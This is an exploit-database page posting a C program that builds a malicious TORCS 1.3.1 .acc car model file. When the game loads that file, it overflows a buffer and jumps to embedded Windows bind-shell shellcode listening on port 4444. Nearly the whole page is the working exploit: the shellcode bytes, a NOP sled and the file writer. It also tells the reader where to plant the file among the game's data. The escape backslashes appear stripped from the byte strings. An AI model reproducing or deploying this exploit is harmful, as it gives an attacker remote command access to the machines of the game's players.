Home / exploits TORCS 1.3.1 Buffer Overflow
Posted on 22 December 2011
/* Exploit Title: TORCS acc Buffer Overflow # Date: 20/12/2011 # Author: Andres Gomez # Software Link: http://torcs.sourceforge.net/ # Version: torcs 1.3.1 # Tested on: Windows # CVE : */ /* This exploit generates a corrupted acc file which has to be saved in the directories where TORCS loads its data, for example replace cars/car4-trb1/car4-trb1.acc and put test.acc or create a new car/track and select it in the TORCS menu */ #include <stdio.h> #include <stdlib.h> /* Shellcode: windows/shell_bind_tcp LPORT=4444 -b 'x00xffx0a' Encoder: x86/shikata_ga_nai */ unsigned char buf[] = "xbdx2exedxb6x2dxddxc2xd9x74x24xf4x5ex2bxc9xb1" "x56x83xeexfcx31x6ex0fx03x6ex21x0fx43xd1xd5x46" "xacx2ax25x39x24xcfx14x6bx52x9bx04xbbx10xc9xa4" "x30x74xfax3fx34x51x0dx88xf3x87x20x09x32x08xee" "xc9x54xf4xedx1dxb7xc5x3dx50xb6x02x23x9axeaxdb" "x2fx08x1bx6fx6dx90x1axbfxf9xa8x64xbax3ex5cxdf" "xc5x6exccx54x8dx96x67x32x2exa6xa4x20x12xe1xc1" "x93xe0xf0x03xeax09xc3x6bxa1x37xebx66xbbx70xcc" "x98xcex8ax2ex25xc9x48x4cxf1x5cx4dxf6x72xc6xb5" "x06x57x91x3ex04x1cxd5x19x09xa3x3ax12x35x28xbd" "xf5xbfx6ax9axd1xe4x29x83x40x41x9cxbcx93x2dx41" "x19xdfxdcx96x1bx82x88x5bx16x3dx49xf3x21x4ex7b" "x5cx9axd8x37x15x04x1ex37x0cxf0xb0xc6xaex01x98" "x0cxfax51xb2xa5x82x39x42x49x57xedx12xe5x07x4e" "xc3x45xf7x26x09x4ax28x56x32x80x5fx50xfcxf0x0c" "x37xfdx06xa3x9bx88xe1xa9x33xddxbax45xf6x3ax73" "xf2x09x69x2fxabx9dx25x39x6bxa1xb5x6fxd8x0ex1d" "xf8xaax5cx9ax19xadx48x8ax50x96x1bx40x0dx55xbd" "x55x04x0dx5exc7xc3xcdx29xf4x5bx9ax7excax95x4e" "x93x75x0cx6cx6exe3x77x34xb5xd0x76xb5x38x6cx5d" "xa5x84x6dxd9x91x58x38xb7x4fx1fx92x79x39xc9x49" "xd0xadx8cxa1xe3xabx90xefx95x53x20x46xe0x6cx8d" "x0exe4x15xf3xaex0bxccxb7xdfx41x4cx91x77x0cx05" "xa3x15xafxf0xe0x23x2cxf0x98xd7x2cx71x9cx9cxea" "x6axecx8dx9ex8cx43xadx8a"; // this points to your shellcode unsigned char function_pointer [] = "xA8xCAx0Ex10"; int main(int argc, char **argv) { FILE *save_fd; int i=0; save_fd = fopen("test.acc", "w"); if (save_fd == NULL) { printf("Failed to open '%s' for writing", "test.acc"); return -1; } fprintf(save_fd, "AC3Db "); fprintf(save_fd, "MATERIAL ""); for(i=0; i < 607; i++) { putc('x90', save_fd); } fprintf(save_fd, "%s%s" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0 ", buf, function_pointer); fprintf(save_fd, "OBJECT world "); fprintf(save_fd, "kids %d ", 5); close(save_fd); return 0; }
